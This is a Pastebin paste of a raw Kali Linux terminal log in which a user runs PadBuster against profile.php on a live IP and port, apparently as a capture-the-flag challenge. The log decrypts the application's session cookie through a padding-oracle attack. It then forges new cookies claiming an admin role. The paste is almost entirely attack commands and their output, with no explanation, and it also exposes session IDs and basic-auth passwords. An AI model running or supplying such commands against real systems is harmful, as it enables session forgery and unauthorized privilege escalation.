Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- *** Starting Block 1 of 6 ***
- ERROR: Encrypted sample was not found in the test request
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb+HgaQSFl9GElvWzNK3K+VtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0 -auth cipherttt:ankit123
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 200
- [+] Location: N/A
- [+] Content Length: 3863
- INFO: Starting PadBuster Decrypt Mode
- *** Starting Block 1 of 6 ***
- ERROR: Encrypted sample was not found in the test request
- root@kali:~/Downloads# clear
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 200
- [+] Location: N/A
- [+] Content Length: 3853
- INFO: Starting PadBuster Decrypt Mode
- *** Starting Block 1 of 6 ***
- ERROR: Encrypted sample was not found in the test request
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -auth rohan:rohan@123
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 200
- [+] Location: N/A
- [+] Content Length: 3853
- INFO: Starting PadBuster Decrypt Mode
- *** Starting Block 1 of 6 ***
- ERROR: Encrypted sample was not found in the test request
- bash: -auth: command not found
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -auth rohan:rohan@123
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 200
- [+] Location: N/A
- [+] Content Length: 3853
- INFO: Starting PadBuster Decrypt Mode
- *** Starting Block 1 of 6 ***
- ERROR: Encrypted sample was not found in the test request
- bash: -auth: command not found
- root@kali:~/Downloads# padbuster
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- Use: padbuster URL EncryptedSample BlockSize [options]
- Where: URL = The target URL (and query string if applicable)
- EncryptedSample = The encrypted value you want to test. Must
- also be present in the URL, PostData or a Cookie
- BlockSize = The block size being used by the algorithm
- Options:
- -auth [username:password]: HTTP Basic Authentication
- -bruteforce: Perform brute force against the first block
- -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
- -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
- -encoding [0-4]: Encoding Format of Sample (Default 0)
- 0=Base64, 1=Lower HEX, 2=Upper HEX
- 3=.NET UrlToken, 4=WebSafe Base64
- -encodedtext [Encoded String]: Data to Encrypt (Encoded)
- -error [Error String]: Padding Error Message
- -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
- -interactive: Prompt for confirmation on decrypted bytes
- -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
- -log: Generate log files (creates folder PadBuster.DDMMYY)
- -noencode: Do not URL-encode the payload (encoded by default)
- -noiv: Sample does not include IV (decrypt first block)
- -plaintext [String]: Plain-Text to Encrypt
- -post [Post Data]: HTTP Post Data String
- -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
- -proxy [address:port]: Use HTTP/S Proxy
- -proxyauth [username:password]: Proxy Authentication
- -resume [Block Number]: Resume at this block number
- -usebody: Use response body content for response analysis phase
- -verbose: Be Verbose
- -veryverbose: Be Very Verbose (Debug Only)
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D --auth rohan:rohan@123
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 200
- [+] Location: N/A
- [+] Content Length: 3853
- INFO: Starting PadBuster Decrypt Mode
- *** Starting Block 1 of 6 ***
- ERROR: Encrypted sample was not found in the test request
- bash: --auth: command not found
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 200
- [+] Location: N/A
- [+] Content Length: 3853
- INFO: Starting PadBuster Decrypt Mode
- *** Starting Block 1 of 6 ***
- ERROR: Encrypted sample was not found in the test request
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Decrypt Mode
- *** Starting Block 1 of 6 ***
- INFO: No error string was provided...starting response analysis
- *** Response Analysis Complete ***
- The following response signatures were returned:
- -------------------------------------------------------
- ID# Freq Status Length Location
- -------------------------------------------------------
- 1 1 302 0 login.php
- 2 ** 255 500 0 N/A
- -------------------------------------------------------
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended :
- Use of uninitialized value $input in pattern match (m//) at /usr/bin/padbuster line 848, <STDIN> line 1.
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended : 2
- Continuing test with selection 2
- [+] Success: (189/256) [Byte 8]
- [+] Success: (40/256) [Byte 7]
- [+] Success: (86/256) [Byte 6]
- [+] Success: (128/256) [Byte 5]
- [+] Success: (250/256) [Byte 4]
- [+] Success: (86/256) [Byte 3]
- [+] Success: (91/256) [Byte 2]
- [+] Success: (52/256) [Byte 1]
- Block 1 Results:
- [+] Cipher Text (HEX): 1a412165f46125bd
- [+] Intermediate Bytes (HEX): c4a2ac0384a9da42
- [+] Plain Text: {"user":
- Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 2.
- *** Starting Block 2 of 6 ***
- [+] Success: (56/256) [Byte 8]
- [+] Success: (171/256) [Byte 7]
- [+] Success: (249/256) [Byte 6]
- [+] Success: (104/256) [Byte 5]
- [+] Success: (240/256) [Byte 4]
- [+] Success: (178/256) [Byte 3]
- [+] Success: (219/256) [Byte 2]
- [+] Success: (208/256) [Byte 1]
- Block 2 Results:
- [+] Cipher Text (HEX): 6ccd2b72be56d19f
- [+] Intermediate Bytes (HEX): 382248159c0457c9
- [+] Plain Text: "ciphert
- *** Starting Block 3 of 6 ***
- [+] Success: (14/256) [Byte 8]
- [+] Success: (68/256) [Byte 7]
- [+] Success: (217/256) [Byte 6]
- [+] Success: (104/256) [Byte 5]
- [+] Success: (165/256) [Byte 4]
- [+] Success: (241/256) [Byte 3]
- [+] Success: (66/256) [Byte 2]
- [+] Success: (240/256) [Byte 1]
- Block 3 Results:
- [+] Cipher Text (HEX): 75a98730ed0a590f
- [+] Intermediate Bytes (HEX): 18b9095e9c24bef3
- [+] Plain Text: tt","rol
- *** Starting Block 4 of 6 ***
- [+] Success: (132/256) [Byte 8]
- [+] Success: (194/256) [Byte 7]
- [+] Success: (134/256) [Byte 6]
- [+] Success: (100/256) [Byte 5]
- [+] Success: (233/256) [Byte 4]
- [+] Success: (69/256) [Byte 3]
- [+] Success: (116/256) [Byte 2]
- [+] Success: (232/256) [Byte 1]
- Block 4 Results:
- [+] Cipher Text (HEX): 08acaf78d63b295f
- [+] Intermediate Bytes (HEX): 108bbd1298793c7d
- [+] Plain Text: e":"user
- *** Starting Block 5 of 6 ***
- [+] Success: (176/256) [Byte 8]
- [+] Success: (219/256) [Byte 7]
- [+] Success: (202/256) [Byte 6]
- [+] Success: (36/256) [Byte 5]
- [+] Success: (141/256) [Byte 4]
- [+] Success: (89/256) [Byte 3]
- [+] Success: (42/256) [Byte 2]
- [+] Success: (222/256) [Byte 1]
- Block 5 Results:
- [+] Cipher Text (HEX): bc859cf9cbb99852
- [+] Intermediate Bytes (HEX): 2ad1a176d8352751
- [+] Plain Text: "}
- *** Starting Block 6 of 6 ***
- [+] Success: (163/256) [Byte 8]
- [+] Success: (108/256) [Byte 7]
- [+] Success: (76/256) [Byte 6]
- [+] Success: (63/256) [Byte 5]
- [+] Success: (14/256) [Byte 4]
- [+] Success: (108/256) [Byte 3]
- [+] Success: (116/256) [Byte 2]
- [+] Success: (70/256) [Byte 1]
- Block 6 Results:
- [+] Cipher Text (HEX): 3fdeba19e4d59b7c
- [+] Intermediate Bytes (HEX): b28b92f7c5b7965c
- [+] Plain Text:
- -------------------------------------------------------
- ** Finished ***
- [+] Decrypted value (ASCII): {"user":"cipherttt","role":"user"}
- [+] Decrypted value (HEX): 7B2275736572223A22636970686572747474222C22726F6C65223A2275736572227D0E0E0E0E0E0E0E0E0E0E0E0E0E0E
- [+] Decrypted value (Base64): eyJ1c2VyIjoiY2lwaGVydHR0Iiwicm9sZSI6InVzZXIifQ4ODg4ODg4ODg4ODg4O
- -------------------------------------------------------
- root@kali:~/Downloads# padbuster
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- Use: padbuster URL EncryptedSample BlockSize [options]
- Where: URL = The target URL (and query string if applicable)
- EncryptedSample = The encrypted value you want to test. Must
- also be present in the URL, PostData or a Cookie
- BlockSize = The block size being used by the algorithm
- Options:
- -auth [username:password]: HTTP Basic Authentication
- -bruteforce: Perform brute force against the first block
- -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
- -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
- -encoding [0-4]: Encoding Format of Sample (Default 0)
- 0=Base64, 1=Lower HEX, 2=Upper HEX
- 3=.NET UrlToken, 4=WebSafe Base64
- -encodedtext [Encoded String]: Data to Encrypt (Encoded)
- -error [Error String]: Padding Error Message
- -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
- -interactive: Prompt for confirmation on decrypted bytes
- -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
- -log: Generate log files (creates folder PadBuster.DDMMYY)
- -noencode: Do not URL-encode the payload (encoded by default)
- -noiv: Sample does not include IV (decrypt first block)
- -plaintext [String]: Plain-Text to Encrypt
- -post [Post Data]: HTTP Post Data String
- -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
- -proxy [address:port]: Use HTTP/S Proxy
- -proxyauth [username:password]: Proxy Authentication
- -resume [Block Number]: Resume at this block number
- -usebody: Use response body content for response analysis phase
- -verbose: Be Verbose
- -veryverbose: Be Very Verbose (Debug Only)
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encodedtext admin:admin
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Encrypt Mode
- [+] Number of Blocks: 1
- INFO: No error string was provided...starting response analysis
- ^C
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encodedtext {"user":"admin","role":"admin"}
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Encrypt Mode
- [+] Number of Blocks: 1
- INFO: No error string was provided...starting response analysis
- *** Response Analysis Complete ***
- The following response signatures were returned:
- -------------------------------------------------------
- ID# Freq Status Length Location
- -------------------------------------------------------
- 1 1 302 0 login.php
- 2 ** 255 500 0 N/A
- -------------------------------------------------------
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended : 2
- Continuing test with selection 2
- [+] Success: (97/256) [Byte 8]
- [+] Success: (155/256) [Byte 7]
- [+] Success: (87/256) [Byte 6]
- [+] Success: (153/256) [Byte 5]
- [+] Success: (61/256) [Byte 4]
- [+] Success: (188/256) [Byte 3]
- [+] Success: (151/256) [Byte 2]
- [+] Success: (167/256) [Byte 1]
- Block 1 Results:
- [+] New Cipher Text (HEX): eba9e9afba08659c
- [+] Intermediate Bytes (HEX): 516e42c663aa679e
- -------------------------------------------------------
- ** Finished ***
- [+] Encrypted value is: 66npr7oIZZwAAAAAAAAAAA%3D%3D
- -------------------------------------------------------
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"admin","role":"admin"}
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Encrypt Mode
- [+] Number of Blocks: 2
- INFO: No error string was provided...starting response analysis
- *** Response Analysis Complete ***
- The following response signatures were returned:
- -------------------------------------------------------
- ID# Freq Status Length Location
- -------------------------------------------------------
- 1 1 302 0 login.php
- 2 ** 255 500 0 N/A
- -------------------------------------------------------
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended : 2
- Continuing test with selection 2
- [+] Success: (97/256) [Byte 8]
- [+] Success: (155/256) [Byte 7]
- [+] Success: (87/256) [Byte 6]
- [+] Success: (153/256) [Byte 5]
- [+] Success: (61/256) [Byte 4]
- [+] Success: (188/256) [Byte 3]
- [+] Success: (151/256) [Byte 2]
- [+] Success: (167/256) [Byte 1]
- Block 2 Results:
- [+] New Cipher Text (HEX): 380044c065ac6198
- [+] Intermediate Bytes (HEX): 516e42c663aa679e
- [+] Success: (109/256) [Byte 8]
- [+] Success: (190/256) [Byte 7]
- [+] Success: (13/256) [Byte 6]
- [+] Success: (129/256) [Byte 5]
- [+] Success: (249/256) [Byte 4]
- [+] Success: (71/256) [Byte 3]
- [+] Success: (96/256) [Byte 2]
- [+] Success: (233/256) [Byte 1]
- Block 1 Results:
- [+] New Cipher Text (HEX): 6ad4da70419124ff
- [+] Intermediate Bytes (HEX): 1fa7bf027bf04092
- -------------------------------------------------------
- ** Finished ***
- [+] Encrypted value is: atTacEGRJP84AETAZaxhmAAAAAAAAAAA
- -------------------------------------------------------
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"admin","role":"admin"}
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Encrypt Mode
- [+] Number of Blocks: 2
- INFO: No error string was provided...starting response analysis
- *** Response Analysis Complete ***
- The following response signatures were returned:
- -------------------------------------------------------
- ID# Freq Status Length Location
- -------------------------------------------------------
- 1 1 302 0 login.php
- 2 ** 255 500 0 N/A
- -------------------------------------------------------
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended : 1
- Continuing test with selection 1
- [+] Success: (1/256) [Byte 8]
- [+] Success: (1/256) [Byte 7]
- [+] Success: (1/256) [Byte 6]
- [+] Success: (1/256) [Byte 5]
- [+] Success: (1/256) [Byte 4]
- [+] Success: (1/256) [Byte 3]
- [+] Success: (1/256) [Byte 2]
- [+] Success: (1/256) [Byte 1]
- Block 2 Results:
- [+] New Cipher Text (HEX): 9e96fffcfdfafbf8
- [+] Intermediate Bytes (HEX): f7f8f9fafbfcfdfe
- [+] Success: (1/256) [Byte 8]
- [+] Success: (1/256) [Byte 7]
- [+] Success: (1/256) [Byte 6]
- [+] Success: (1/256) [Byte 5]
- [+] Success: (1/256) [Byte 4]
- [+] Success: (1/256) [Byte 3]
- [+] Success: (1/256) [Byte 2]
- [+] Success: (1/256) [Byte 1]
- Block 1 Results:
- [+] New Cipher Text (HEX): 828b9c88c19d9993
- [+] Intermediate Bytes (HEX): f7f8f9fafbfcfdfe
- -------------------------------------------------------
- ** Finished ***
- [+] Encrypted value is: gouciMGdmZOelv%2F8%2Ffr7%2BAAAAAAAAAAA
- -------------------------------------------------------
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohan","role":"admin"}
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Encrypt Mode
- [+] Number of Blocks: 2
- INFO: No error string was provided...starting response analysis
- *** Response Analysis Complete ***
- The following response signatures were returned:
- -------------------------------------------------------
- ID# Freq Status Length Location
- -------------------------------------------------------
- 1 1 302 0 login.php
- 2 ** 255 500 0 N/A
- -------------------------------------------------------
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended : 2
- Continuing test with selection 2
- [+] Success: (97/256) [Byte 8]
- [+] Success: (155/256) [Byte 7]
- [+] Success: (87/256) [Byte 6]
- [+] Success: (153/256) [Byte 5]
- [+] Success: (61/256) [Byte 4]
- [+] Success: (188/256) [Byte 3]
- [+] Success: (151/256) [Byte 2]
- [+] Success: (167/256) [Byte 1]
- Block 2 Results:
- [+] New Cipher Text (HEX): 300044c065ac6198
- [+] Intermediate Bytes (HEX): 516e42c663aa679e
- [+] Success: (85/256) [Byte 8]
- [+] Success: (67/256) [Byte 7]
- [+] Success: (146/256) [Byte 6]
- [+] Success: (91/256) [Byte 5]
- [+] Success: (5/256) [Byte 4]
- [+] Success: (243/256) [Byte 3]
- [+] Success: (88/256) [Byte 2]
- [+] Success: (108/256) [Byte 1]
- Block 1 Results:
- [+] New Cipher Text (HEX): e9dc6e8c9b1fd0c2
- [+] Intermediate Bytes (HEX): 9caf0bfea16dbfaa
- -------------------------------------------------------
- ** Finished ***
- [+] Encrypted value is: 6dxujJsf0MIwAETAZaxhmAAAAAAAAAAA
- -------------------------------------------------------
- root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohanpan","role":"admin"}
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Encrypt Mode
- [+] Number of Blocks: 2
- INFO: No error string was provided...starting response analysis
- *** Response Analysis Complete ***
- The following response signatures were returned:
- -------------------------------------------------------
- ID# Freq Status Length Location
- -------------------------------------------------------
- 1 1 302 0 login.php
- 2 ** 255 500 0 N/A
- -------------------------------------------------------
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended : 2
- Continuing test with selection 2
- [+] Success: (97/256) [Byte 8]
- [+] Success: (155/256) [Byte 7]
- [+] Success: (6/256) [Byte 6]
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: 500 Can't connect to 88.198.233.174:48066
- Retrying in 10 seconds...
- ERROR: Number of retries has exceeded 15 attempts...quitting.
- root@kali:~/Downloads# padbuster http://88.198.233.174:48126/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohanpan","role":"admin"}
- +-------------------------------------------+
- | PadBuster - v0.3.3 |
- | Brian Holyfield - Gotham Digital Science |
- | labs@gdssecurity.com |
- +-------------------------------------------+
- INFO: The original request returned the following
- [+] Status: 302
- [+] Location: login.php
- [+] Content Length: 0
- INFO: Starting PadBuster Encrypt Mode
- [+] Number of Blocks: 2
- INFO: No error string was provided...starting response analysis
- *** Response Analysis Complete ***
- The following response signatures were returned:
- -------------------------------------------------------
- ID# Freq Status Length Location
- -------------------------------------------------------
- 1 1 302 0 login.php
- 2 ** 255 500 0 N/A
- -------------------------------------------------------
- Enter an ID that matches the error condition
- NOTE: The ID# marked with ** is recommended : 2
- Continuing test with selection 2
- [+] Success: (97/256) [Byte 8]
- [+] Success: (155/256) [Byte 7]
- [+] Success: (87/256) [Byte 6]
- [+] Success: (153/256) [Byte 5]
- [+] Success: (61/256) [Byte 4]
- [+] Success: (188/256) [Byte 3]
- [+] Success: (151/256) [Byte 2]
- [+] Success: (167/256) [Byte 1]
- Block 2 Results:
- [+] New Cipher Text (HEX): 300032a70da9649d
- [+] Intermediate Bytes (HEX): 516e42c663aa679e
- [+] Success: (166/256) [Byte 8]
- [+] Success: (44/256) [Byte 7]
- [+] Success: (192/256) [Byte 6]
- [+] Success: (2/256) [Byte 5]
- [+] Success: (84/256) [Byte 4]
- [+] Success: (160/256) [Byte 3]
- [+] Success: (132/256) [Byte 2]
- [+] Success: (225/256) [Byte 1]
- Block 1 Results:
- [+] New Cipher Text (HEX): 620803dbc031b933
- [+] Intermediate Bytes (HEX): 177b66a9fa43d65b
- -------------------------------------------------------
- ** Finished ***
- [+] Encrypted value is: YggD28AxuTMwADKnDalknQAAAAAAAAAA
- -------------------------------------------------------
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# padbuster http://88.198.233.174:48126/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohanpan","role":"admin"}^C
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads# ^C
- root@kali:~/Downloads#
Add Comment
Please, Sign In to add comment